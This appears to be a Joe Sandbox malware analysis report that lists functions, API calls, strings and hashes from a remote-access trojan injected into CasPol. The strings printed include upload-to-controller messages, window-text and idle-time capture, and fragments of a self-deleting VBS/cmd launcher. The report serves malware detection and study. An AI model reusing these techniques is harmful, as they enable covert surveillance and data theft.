                            • API String ID: 2490988753-744132762
                            • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                            • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                            • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                            • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                            Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                            • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumOpen
                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                            • API String ID: 1332880857-3714951968
                            • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                            • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                            • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                            • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                            Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                            Download Yara Rule
                            APIs
                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                            • GetCursorPos.USER32(?), ref: 0041D5E9
                            • SetForegroundWindow.USER32(?), ref: 0041D5F2
                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                            • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                            • ExitProcess.KERNEL32 ref: 0041D665
                            • CreatePopupMenu.USER32 ref: 0041D66B
                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                            • String ID: Close
                            • API String ID: 1657328048-3535843008
                            • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                            • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                            • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                            • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                            Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$Info
                            • String ID:
                            • API String ID: 2509303402-0
                            • Opcode ID: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                            • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                            • Opcode Fuzzy Hash: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                            • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                            Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                            • __aulldiv.LIBCMT ref: 00408D4D
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                            • CloseHandle.KERNEL32(00000000), ref: 00408F64
                            • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                            • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                            • API String ID: 3086580692-2582957567
                            • Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                            • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                            • Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                            • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                            Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00001388), ref: 0040A740
                              • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                              • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                              • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                              • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                            • String ID: 8SG$8SG$pQG$pQG$PG$PG
                            • API String ID: 3795512280-1152054767
                            • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                            • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                            • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                            • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                            Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 0045130A
                              • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                              • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                              • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                            • _free.LIBCMT ref: 004512FF
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00451321
                            • _free.LIBCMT ref: 00451336
                            • _free.LIBCMT ref: 00451341
                            • _free.LIBCMT ref: 00451363
                            • _free.LIBCMT ref: 00451376
                            • _free.LIBCMT ref: 00451384
                            • _free.LIBCMT ref: 0045138F
                            • _free.LIBCMT ref: 004513C7
                            • _free.LIBCMT ref: 004513CE
                            • _free.LIBCMT ref: 004513EB
                            • _free.LIBCMT ref: 00451403
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                            • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                            • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                            • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                            Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00419FB9
                            • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                            • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                            • GetLocalTime.KERNEL32(?), ref: 0041A105
                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                            • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                            • API String ID: 489098229-1431523004
                            • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                            • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                            • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                            • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                            Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                              • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                              • Part of subcall function 004136F8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                              • Part of subcall function 004136F8: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                              • Part of subcall function 004136F8: RegCloseKey.KERNELBASE(00000000), ref: 00413738
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                            • ExitProcess.KERNEL32 ref: 0040D9C4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                            • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                            • API String ID: 1913171305-3159800282
                            • Opcode ID: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                            • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                            • Opcode Fuzzy Hash: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                            • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                            Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                            • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                            • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                            • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                            Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                            • closesocket.WS2_32(000000FF), ref: 00404E5A
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                            • String ID:
                            • API String ID: 3658366068-0
                            • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                            • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                            • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                            • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                            Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                            • GetLastError.KERNEL32 ref: 00455CEF
                            • __dosmaperr.LIBCMT ref: 00455CF6
                            • GetFileType.KERNEL32(00000000), ref: 00455D02
                            • GetLastError.KERNEL32 ref: 00455D0C
                            • __dosmaperr.LIBCMT ref: 00455D15
                            • CloseHandle.KERNEL32(00000000), ref: 00455D35
                            • CloseHandle.KERNEL32(?), ref: 00455E7F
                            • GetLastError.KERNEL32 ref: 00455EB1
                            • __dosmaperr.LIBCMT ref: 00455EB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                            • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                            • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                            • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                            Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                            Download Yara Rule
                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                            • __alloca_probe_16.LIBCMT ref: 00453EEA
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                            • __alloca_probe_16.LIBCMT ref: 00453F94
                            • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                            • __freea.LIBCMT ref: 00454003
                            • __freea.LIBCMT ref: 0045400F
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                            • String ID: \@E
                            • API String ID: 201697637-1814623452
                            • Opcode ID: 6b713b73fa418151b2ceeed66ebddf9bdcb7dc27971baa6073fd327f22c08990
                            • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                            • Opcode Fuzzy Hash: 6b713b73fa418151b2ceeed66ebddf9bdcb7dc27971baa6073fd327f22c08990
                            • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                            Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: \&G$\&G$`&G
                            • API String ID: 269201875-253610517
                            • Opcode ID: 385e3eb32a840c7dc5f1be6bba42808b1b8798b7ea310d4b8652956360c688d1
                            • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                            • Opcode Fuzzy Hash: 385e3eb32a840c7dc5f1be6bba42808b1b8798b7ea310d4b8652956360c688d1
                            • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                            Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 65535$udp
                            • API String ID: 0-1267037602
                            • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                            • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                            • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                            • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                            Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                            Download Yara Rule
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 0040AD38
                            • Sleep.KERNEL32(000001F4), ref: 0040AD43
                            • GetForegroundWindow.USER32 ref: 0040AD49
                            • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                            • Sleep.KERNEL32(000003E8), ref: 0040AE54
                              • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                            • String ID: [${ User has been idle for $ minutes }$]
                            • API String ID: 911427763-3954389425
                            • Opcode ID: 1fd890e2d21f894b0b3b077f7e4e96656cdfff5721ec9a02ea1a5f8763c76f61
                            • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                            • Opcode Fuzzy Hash: 1fd890e2d21f894b0b3b077f7e4e96656cdfff5721ec9a02ea1a5f8763c76f61
                            • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                            Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                            • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                            • __dosmaperr.LIBCMT ref: 0043A8A6
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                            • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                            • __dosmaperr.LIBCMT ref: 0043A8E3
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                            • __dosmaperr.LIBCMT ref: 0043A937
                            • _free.LIBCMT ref: 0043A943
                            • _free.LIBCMT ref: 0043A94A
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                            • String ID:
                            • API String ID: 2441525078-0
                            • Opcode ID: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                            • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                            • Opcode Fuzzy Hash: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                            • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                            Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 004054BF
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                            • TranslateMessage.USER32(?), ref: 0040557E
                            • DispatchMessageA.USER32(?), ref: 00405589
                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                            • String ID: CloseChat$DisplayMessage$GetMessage
                            • API String ID: 2956720200-749203953
                            • Opcode ID: 2eb2f374b938242071c93788593a146c5cd764c3a8e17b9f296123b837d09fc8
                            • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                            • Opcode Fuzzy Hash: 2eb2f374b938242071c93788593a146c5cd764c3a8e17b9f296123b837d09fc8
                            • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                            Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                            • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                            • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
